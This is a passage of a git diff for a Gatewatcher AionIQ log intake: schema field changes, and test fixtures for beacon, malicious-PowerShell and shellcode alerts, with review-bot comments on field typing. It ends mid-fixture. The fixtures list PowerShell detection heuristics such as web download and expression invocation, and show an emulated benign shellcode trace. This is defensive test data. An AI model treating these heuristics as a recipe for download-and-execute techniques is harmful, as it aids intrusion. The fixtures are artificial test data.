gatewatcher.nba.payload type: text + gatewatcher.nba.payload_printable: description: nba payload_printable field name: gatewatcher.nba.payload_printable type: text + gatewatcher.nba.rev: description: nba rev field name: gatewatcher.nba.rev type: text + gatewatcher.nba.signature: description: nba signature field name: gatewatcher.nba.signature type: text + gatewatcher.nba.signature_id: description: nba signature_id field name: gatewatcher.nba.signature_id type: text + gatewatcher.nba.stream: description: nba stream field name: gatewatcher.nba.stream type: text + gatewatcher.network.flow_id: description: Gatewatcher specific flow_id for network part name: gatewatcher.network.flow_id type: number + gatewatcher.network.timestamp: 
description: Network timestamp field name: gatewatcher.network.timestamp type: datetime + gatewatcher.network.tx_id: description: tx_id network field name: gatewatcher.network.tx_id type: number + gatewatcher.nfs.file_tx: description: nfs file_tx field name: gatewatcher.nfs.file_tx type: boolean + gatewatcher.nfs.filename: description: nfs filename field name: gatewatcher.nfs.filename type: text + gatewatcher.nfs.hhash: description: nfs hhash field name: gatewatcher.nfs.hhash type: text + gatewatcher.nfs.id: description: nfs id field name: gatewatcher.nfs.id type: number + gatewatcher.nfs.procedure: description: nfs procedure field name: gatewatcher.nfs.procedure type: text + gatewatcher.nfs.status: description: nfs status field name: gatewatcher.nfs.status type: text + gatewatcher.nfs.type: description: nfs type field name: gatewatcher.nfs.type type: text + gatewatcher.nfs.version: description: nfs version field name: gatewatcher.nfs.version type: number + gatewatcher.notification.component: description: notification component field name: gatewatcher.notification.component type: text + gatewatcher.notification.description: description: notification description field name: gatewatcher.notification.description type: text + gatewatcher.notification.details: description: notification details field name: gatewatcher.notification.details type: text + gatewatcher.notification.external_redirection: description: notification external_redirection field name: gatewatcher.notification.external_redirection type: text + gatewatcher.notification.internal_redirection: description: notification internal_redirection field name: gatewatcher.notification.internal_redirection type: text + gatewatcher.notification.resolution: description: notification resolution field name: gatewatcher.notification.resolution type: text + gatewatcher.notification.risk: description: notification risk field name: gatewatcher.notification.risk type: number + gatewatcher.notification.title: description: 
notification title field name: gatewatcher.notification.title type: text + gatewatcher.observer.gcap.hostname: description: GCap hostname field name: gatewatcher.observer.gcap.hostname type: text + gatewatcher.observer.gcap.ingress.interface.name: description: Gatewatcher ingress interface name name: gatewatcher.observer.gcap.ingress.interface.name type: text + gatewatcher.observer.gcap.version: description: GCap version observer field name: gatewatcher.observer.gcap.version type: text + gatewatcher.observer.log_format_version: description: Observer log format version field name: gatewatcher.observer.log_format_version type: text + gatewatcher.observer.uuid: description: Observer UUID field name: gatewatcher.observer.uuid type: text + gatewatcher.ransomware.alert_threshold: description: ransomware alert_threshold field name: gatewatcher.ransomware.alert_threshold type: text + gatewatcher.ransomware.malicious_behavior_confidence: description: ransomware malicious_behavior_confidence field name: gatewatcher.ransomware.malicious_behavior_confidence type: text + gatewatcher.ransomware.session_score: description: ransomware session_score field name: gatewatcher.ransomware.session_score type: text + gatewatcher.rdp.channels: description: rdp channels field name: gatewatcher.rdp.channels type: text + gatewatcher.rdp.client: description: rdp client field name: gatewatcher.rdp.client type: text + gatewatcher.rdp.cookie: description: rdp cookie field name: gatewatcher.rdp.cookie type: text + gatewatcher.rdp.event_type: description: rdp event_type field name: gatewatcher.rdp.event_type type: text + gatewatcher.rdp.protocol: description: rdp protocol field name: gatewatcher.rdp.protocol type: text + gatewatcher.rdp.server_supports: description: rdp server_supports field name: gatewatcher.rdp.server_supports type: text + gatewatcher.rdp.tx_id: description: rdp tx_id field name: gatewatcher.rdp.tx_id type: number -gatewatcher.reporting_token: - description: Token used by Gbox - 
name: gatewatcher.reporting_token - type: keyword -gatewatcher.retroact: - description: Analysis result per retroact - name: gatewatcher.retroact - type: keyword + gatewatcher.rfb.authentication: description: rfb authentication field name: gatewatcher.rfb.authentication type: text + gatewatcher.rfb.client_protocol_version: description: rfb client_protocol_version field name: gatewatcher.rfb.client_protocol_version type: text + gatewatcher.rfb.server_protocol_version: description: rfb server_protocol_version field name: gatewatcher.rfb.server_protocol_version type: text + gatewatcher.rfb.server_security_failure_reason: description: rfb server_security_failure_reason field name: gatewatcher.rfb.server_security_failure_reason type: text + gatewatcher.shellcode.analysis: description: shellcode analysis field name: gatewatcher.shellcode.analysis type: text + gatewatcher.shellcode.encodings: description: shellcode encodings field name: gatewatcher.shellcode.encodings type: text + gatewatcher.shellcode.id: description: shellcode id field name: gatewatcher.shellcode.id type: text + gatewatcher.shellcode.sample_id: description: shellcode sample_id field name: gatewatcher.shellcode.sample_id type: text + gatewatcher.shellcode.sub_type: description: shellcode sub_type field name: gatewatcher.shellcode.sub_type type: text + gatewatcher.sigflow.action: description: sigflow action field name: gatewatcher.sigflow.action type: text + gatewatcher.sigflow.category: description: sigflow category field name: gatewatcher.sigflow.category type: text + gatewatcher.sigflow.gid: description: sigflow gid field name: gatewatcher.sigflow.gid type: number + gatewatcher.sigflow.metadata: description: sigflow metadata field name: gatewatcher.sigflow.metadata type: text + gatewatcher.sigflow.packet: description: sigflow packet field name: gatewatcher.sigflow.packet type: text + gatewatcher.sigflow.packet_info: description: sigflow packet_info field name: gatewatcher.sigflow.packet_info type: text 
+ gatewatcher.sigflow.payload: description: sigflow payload field name: gatewatcher.sigflow.payload type: text + gatewatcher.sigflow.payload_printable: description: sigflow payload_printable field name: gatewatcher.sigflow.payload_printable type: text + gatewatcher.sigflow.rev: description: sigflow rev field name: gatewatcher.sigflow.rev type: number + gatewatcher.sigflow.signature: description: sigflow signature field name: gatewatcher.sigflow.signature type: text + gatewatcher.sigflow.signature_id: description: sigflow signature_id field name: gatewatcher.sigflow.signature_id type: number + gatewatcher.sigflow.stream: description: sigflow stream field name: gatewatcher.sigflow.stream type: number + gatewatcher.sip.method: description: sip method field name: gatewatcher.sip.method type: text + gatewatcher.sip.request_line: description: sip request_line field name: gatewatcher.sip.request_line type: text + gatewatcher.sip.uri: description: sip uri field name: gatewatcher.sip.uri type: text + gatewatcher.sip.version: description: sip version field name: gatewatcher.sip.version type: text -gatewatcher.smb: - description: smb metadata field - name: gatewatcher.smb - type: text + gatewatcher.smb.command: description: smb command field name: gatewatcher.smb.command type: text + gatewatcher.smb.dialect: description: smb dialect field name: gatewatcher.smb.dialect type: text + gatewatcher.smb.id: description: smb id field name: gatewatcher.smb.id type: number + gatewatcher.smb.session_id: description: smb session id field name: gatewatcher.smb.session_id type: number + gatewatcher.smb.status: description: smb status field name: gatewatcher.smb.status type: text + gatewatcher.smb.status_code: description: smb status_code field name: gatewatcher.smb.status_code type: text + gatewatcher.smb.tree_id: description: smb tree_id field name: gatewatcher.smb.tree_id type: number + gatewatcher.smtp.helo: description: smtp helo field name: gatewatcher.smtp.helo type: text + 
gatewatcher.smtp.mail_from: description: smtp mail from field name: gatewatcher.smtp.mail_from type: text + gatewatcher.smtp.rcpt_to: description: smtp recipients field name: gatewatcher.smtp.rcpt_to type: text + gatewatcher.snmp.community: description: snmp community field name: gatewatcher.snmp.community type: text + gatewatcher.snmp.pdu_type: description: snmp pdu_type field name: gatewatcher.snmp.pdu_type type: text + gatewatcher.snmp.vars: description: snmp vars field name: gatewatcher.snmp.vars type: text + gatewatcher.snmp.version: description: snmp version field name: gatewatcher.snmp.version type: number + gatewatcher.ssh.client.hassh: description: ssh client hassh field name: gatewatcher.ssh.client.hassh type: text + gatewatcher.ssh.client.proto_version: description: ssh client proto_version field name: gatewatcher.ssh.client.proto_version type: text + gatewatcher.ssh.client.software_version: description: ssh client software_version field name: gatewatcher.ssh.client.software_version type: text + gatewatcher.ssh.server.hassh: description: ssh server hassh field name: gatewatcher.ssh.server.hassh type: text + gatewatcher.ssh.server.proto_version: description: ssh server proto_version field name: gatewatcher.ssh.server.proto_version type: text + gatewatcher.ssh.server.software_version: description: ssh server software_version field name: gatewatcher.ssh.server.software_version type: text -gatewatcher.state: - description: Analysis result - name: gatewatcher.state - type: keyword + gatewatcher.syslog.message: description: syslog message field name: gatewatcher.syslog.message type: text + gatewatcher.tftp.file: description: tftp file field name: gatewatcher.tftp.file type: text + gatewatcher.tftp.mode: description: tftp mode field name: gatewatcher.tftp.mode type: text + gatewatcher.tftp.packet: description: tftp packet field name: gatewatcher.tftp.packet type: text -gatewatcher.timestamp_analyzed: - description: Timestamp of the alert processing by gcenter - 
name: gatewatcher.timestamp_analyzed - type: keyword -gatewatcher.timestamp_detected: - description: Timestamp of the file collection by gcap - name: gatewatcher.timestamp_detected - type: keyword + gatewatcher.tls: description: TLS meta data field name: gatewatcher.tls type: text -gatewatcher.type: - description: Type of analysis - name: gatewatcher.type - type: keyword + gatewatcher.user_agent.major: description: user_agent major field name: gatewatcher.user_agent.major type: text + gatewatcher.user_agent.minor: description: user_agent minor field name: gatewatcher.user_agent.minor type: text + gatewatcher.user_agent.os.major: description: user_agent os major field name: gatewatcher.user_agent.os.major type: text -gatewatcher.user_agent.os.patch: - description: user_agent os patch field - name: gatewatcher.user_agent.os.patch + +gatewatcher.user_agent.patch: + description: user_agent patch field + name: gatewatcher.user_agent.patch type: text + gatewatcher.version: description: '@version field' name: gatewatcher.version diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json new file mode 100644 index 000000000..3626c4db0 --- /dev/null +++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json 
@@ -0,0 +1,92 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Gatewatcher AionIQ V103",
+ "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+ }
+ },
+ "message": "{\n \"tls\": {\n \"client\": {\n \"server_name\": \"cisco-update.com\"\n }\n },\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n \"severity\": 3,\n \"module\": \"beacon_detect\",\n \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"kind\": \"alert\",\n \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n \"dataset\": \"alert\"\n },\n \"source\": {\n \"ip\": \"10.0.0.60\",\n \"mac\": \"60:57:18:e9:4f:5d\"\n },\n \"beacon\": {\n \"mean_time_interval\": 1,\n \"active\": true,\n \"possible_cnc\": \"not_recognized\",\n \"session_count\": 260,\n \"type\": \"constant\",\n \"id\": \"c4c886b4ad\",\n \"hostname_resolution\": \"not_analyzed\"\n },\n \"destination\": {\n \"ip\": \"157.230.93.100\",\n \"port\": 443\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n \"url\": {\n \"domain\": \"cisco-update.com\"\n },\n \"network\": {\n \"protocol\": \"tls\",\n \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n \"transport\": \"tcp\"\n }\n}"
+ },
+ "expected": {
+ "message": "{\n \"tls\": {\n \"client\": {\n \"server_name\": \"cisco-update.com\"\n }\n },\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n \"severity\": 3,\n \"module\": \"beacon_detect\",\n \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"kind\": \"alert\",\n \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n \"dataset\": \"alert\"\n },\n \"source\": {\n \"ip\": \"10.0.0.60\",\n \"mac\": \"60:57:18:e9:4f:5d\"\n },\n \"beacon\": {\n \"mean_time_interval\": 1,\n \"active\": true,\n \"possible_cnc\": \"not_recognized\",\n \"session_count\": 260,\n \"type\": \"constant\",\n \"id\": \"c4c886b4ad\",\n \"hostname_resolution\": \"not_analyzed\"\n },\n \"destination\": {\n \"ip\": \"157.230.93.100\",\n \"port\": 443\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n \"url\": {\n \"domain\": \"cisco-update.com\"\n },\n \"network\": {\n \"protocol\": \"tls\",\n \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n \"transport\": \"tcp\"\n }\n}",
+ "event": {
+ "category": [
+ "intrusion_detection",
+ "network"
+ ],
+ "dataset": "alert",
+ "kind": "alert",
+ "module": "beacon_detect",
+ "severity": 3
+ },
+ "@timestamp": "2024-09-09T13:02:59.354490Z",
+ "destination": {
+ "address": "157.230.93.100",
+ "ip": "157.230.93.100",
+ "port": 443
+ },
+ "gatewatcher": {
+ "beacon": {
+ "active": "true",
+ "hostname_resolution": "not_analyzed",
+ "mean_time_interval": "1",
+ "possible_cnc": "not_recognized",
+ "session_count": "260",
+ "type": "constant"
+ },
+ "event": {
+ "created": "2024-09-09T13:02:34.254441Z",
+ "id": "5e7bb104-6493-43b2-be4d-f7c28ce79e85"
+ },
+ "network": {
+ "timestamp": "2024-09-09T11:47:44.012000Z"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "tls": "{\"client\": {\"server_name\": \"cisco-update.com\"}}",
+ "version": "1"
+ },
+ "network": {
+ "protocol": "tls",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "cisco-update.com",
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "10.0.0.60",
+ "157.230.93.100"
+ ]
+ },
+ "source": {
+ "address": "10.0.0.60",
+ "ip": "10.0.0.60",
+ "mac": "60:57:18:e9:4f:5d"
+ },
+ "tls": {
+ "client": {
+ "server_name": "cisco-update.com"
+ }
+ },
+ "url": {
+ "domain": "cisco-update.com",
+ "registered_domain": "cisco-update.com",
+ "top_level_domain": "com"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
new file mode 100644
index 000000000..d6d87aeb8
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
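Review bot: The expected `gatewatcher.beacon` block pins `"active": "true"`, `"mean_time_interval": "1"` and `"session_count": "260"` as strings although the input message carries them as a boolean and numbers, so a consumer wanting a numeric threshold on session_count or a boolean filter on active has to cast first. The `gatewatcher.beacon.*` declarations are outside this chunk; if fields.yml types them as text the fixture is consistent with that, but `boolean`/`number` types with the fixture asserting `true`, `1` and `260` would keep the source types intact. The `gatewatcher.tls` value `"{\"client\": {\"server_name\": \"cisco-update.com\"}}"` is JSON re-serialized into a string and duplicates `tls.client.server_name`, which the same expected output already maps; it is declared `type: text` in the fields.yml hunk above, so the duplication looks intentional but deserves a note in that field's description. The input's `beacon.id` (`c4c886b4ad`) does not appear anywhere in the expected output, so the fixture does not state whether dropping it is intended.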
@@ -0,0 +1,85 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"network\": {\n \"protocol\": \"unknown\",\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n \"flow_id\": 779924698221176\n },\n \"source\": {\n \"port\": 35444,\n \"ip\": \"10.127.0.111\"\n },\n \"destination\": {\n \"port\": 4242,\n \"ip\": \"10.127.0.222\"\n },\n \"malicious_powershell\": {\n \"proba_obfuscated\": 1,\n \"score\": 1890,\n \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n \"score_details\": {\n \"StrReplace\": 0,\n \"StreamReader\": 0,\n \"StartBitsTransfer\": 0,\n \"InvokeRestMethod\": 0,\n \"Base64\": 1520,\n \"StreamWriter\": 0,\n \"InvokeExpression\": 0,\n \"SystemIOFile\": 0,\n \"StrJoin\": 0,\n \"StrCat\": 370,\n \"WebClientInvokation\": 0,\n \"GetContent\": 0,\n \"FmtStr\": 0,\n \"CharInt\": 0,\n \"InvokeWebRequest\": 0,\n \"AddContent\": 0,\n \"SetContent\": 0\n }\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n \"@version\": \"1\",\n \"event\": {\n \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n \"kind\": \"alert\",\n \"module\": \"malicious_powershell_detect\",\n \"severity\": 1,\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"created\": \"2024-09-11T09:11:52.735668+0000\"\n }\n}" + }, + "expected": 
{ + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"network\": {\n \"protocol\": \"unknown\",\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n \"flow_id\": 779924698221176\n },\n \"source\": {\n \"port\": 35444,\n \"ip\": \"10.127.0.111\"\n },\n \"destination\": {\n \"port\": 4242,\n \"ip\": \"10.127.0.222\"\n },\n \"malicious_powershell\": {\n \"proba_obfuscated\": 1,\n \"score\": 1890,\n \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n \"score_details\": {\n \"StrReplace\": 0,\n \"StreamReader\": 0,\n \"StartBitsTransfer\": 0,\n \"InvokeRestMethod\": 0,\n \"Base64\": 1520,\n \"StreamWriter\": 0,\n \"InvokeExpression\": 0,\n \"SystemIOFile\": 0,\n \"StrJoin\": 0,\n \"StrCat\": 370,\n \"WebClientInvokation\": 0,\n \"GetContent\": 0,\n \"FmtStr\": 0,\n \"CharInt\": 0,\n \"InvokeWebRequest\": 0,\n \"AddContent\": 0,\n \"SetContent\": 0\n }\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n \"@version\": \"1\",\n \"event\": {\n \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n \"kind\": \"alert\",\n \"module\": \"malicious_powershell_detect\",\n \"severity\": 1,\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"created\": \"2024-09-11T09:11:52.735668+0000\"\n }\n}", + "event": { + "category": [ + "intrusion_detection", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "malicious_powershell_detect", + "severity": 1 + }, + 
"@timestamp": "2024-09-11T09:11:52.737102Z",
+ "destination": {
+ "address": "10.127.0.222",
+ "ip": "10.127.0.222",
+ "port": 4242
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2024-09-11T09:11:52.735668Z",
+ "id": "de7b5e80-a4b2-4ed6-b566-3590945e34d5"
+ },
+ "malicious_powershell": {
+ "id": "60b656e17bec0a97f5638790c78a3124",
+ "proba_obfuscated": 1,
+ "sample_id": "09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr",
+ "score": 1890,
+ "score_details": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}"
+ },
+ "network": {
+ "flow_id": 779924698221176,
+ "timestamp": "2024-09-11T09:10:46.975548Z"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "ingress": {
+ "interface": {
+ "name": "monvirt"
+ }
+ },
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "version": "1"
+ },
+ "network": {
+ "protocol": "unknown",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "10.127.0.111",
+ "10.127.0.222"
+ ]
+ },
+ "source": {
+ "address": "10.127.0.111",
+ "ip": "10.127.0.111",
+ "port": 35444
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
new file mode 100644
index 000000000..048d8d91d
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
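Review bot: `gatewatcher.malicious_powershell.score_details` is expected as a JSON-encoded string, so the per-heuristic scores that make this alert actionable (`Base64` 1520, `StrCat` 370) are no longer numeric and cannot be used in range queries or detection rules without a consumer re-parsing JSON out of a keyword field. If the field is declared as `keyword` in `_meta/fields.yml` (outside this hunk), consider keeping it as an object, or lifting the few sub-scores analysts pivot on into dedicated numeric fields. The same double-encoding appears in `shellcode.analysis` and `shellcode.encodings` in codebreaker_shellcode_alert.json, in `history.content` in history.json and in `ioc.external_links` in ioc.json, so the decision should be made once for the whole intake.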
@@ -0,0 +1,92 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"network\": {\n \"protocol\": \"unknown\",\n \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 888739207482646\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"destination\": {\n \"port\": 6666,\n \"ip\": \"178.160.128.2\"\n },\n \"source\": {\n \"port\": 60078,\n \"ip\": \"80.15.17.183\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"shellcode\": {\n \"sub_type\": \"Windows_x86_32\",\n \"encodings\": [\n {\n \"name\": \"Bloxor\",\n \"count\": 4\n }\n ],\n \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n \"analysis\": [\n {\n \"call\": \"kernel32_LoadLibraryA\",\n \"args\": \"{lpFileName: user32.dll}\",\n \"_id\": 0,\n \"ret\": \"0x70600000\"\n },\n {\n \"call\": \"user32_MessageBoxA\",\n \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n \"_id\": 1,\n \"ret\": \"1\"\n },\n {\n \"call\": \"kernel32_ExitProcess\",\n \"args\": \"{uExitCode: 0}\",\n \"_id\": 2,\n \"ret\": \"0\"\n },\n {\n \"info\": \"Stop : End of shellcode (Exit)\",\n \"_id\": -1\n }\n ],\n \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n },\n \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n \"@version\": \"1\",\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"shellcode_detect\",\n 
\"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"severity\": 1,\n \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n \"created\": \"2024-09-11T15:36:36.068564+0000\"\n }\n}" + }, + "expected": { + "message": "{\n \"network\": {\n \"protocol\": \"unknown\",\n \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 888739207482646\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"destination\": {\n \"port\": 6666,\n \"ip\": \"178.160.128.2\"\n },\n \"source\": {\n \"port\": 60078,\n \"ip\": \"80.15.17.183\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"shellcode\": {\n \"sub_type\": \"Windows_x86_32\",\n \"encodings\": [\n {\n \"name\": \"Bloxor\",\n \"count\": 4\n }\n ],\n \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n \"analysis\": [\n {\n \"call\": \"kernel32_LoadLibraryA\",\n \"args\": \"{lpFileName: user32.dll}\",\n \"_id\": 0,\n \"ret\": \"0x70600000\"\n },\n {\n \"call\": \"user32_MessageBoxA\",\n \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n \"_id\": 1,\n \"ret\": \"1\"\n },\n {\n \"call\": \"kernel32_ExitProcess\",\n \"args\": \"{uExitCode: 0}\",\n \"_id\": 2,\n \"ret\": \"0\"\n },\n {\n \"info\": \"Stop : End of shellcode (Exit)\",\n \"_id\": -1\n }\n ],\n \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n },\n \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n \"@version\": \"1\",\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n 
\"module\": \"shellcode_detect\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"severity\": 1,\n \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n \"created\": \"2024-09-11T15:36:36.068564+0000\"\n }\n}",
+ "event": {
+ "category": [
+ "intrusion_detection",
+ "network"
+ ],
+ "dataset": "alert",
+ "kind": "alert",
+ "module": "shellcode_detect",
+ "severity": 1
+ },
+ "@timestamp": "2024-09-11T15:36:36.071882Z",
+ "destination": {
+ "address": "178.160.128.2",
+ "ip": "178.160.128.2",
+ "port": 6666
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2024-09-11T15:36:36.068564Z",
+ "id": "8c03d100-794f-45fe-8d92-7409c925b255"
+ },
+ "network": {
+ "flow_id": 888739207482646,
+ "timestamp": "2024-09-11T15:35:30.167846Z"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "ingress": {
+ "interface": {
+ "name": "monvirt"
+ }
+ },
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "shellcode": {
+ "analysis": [
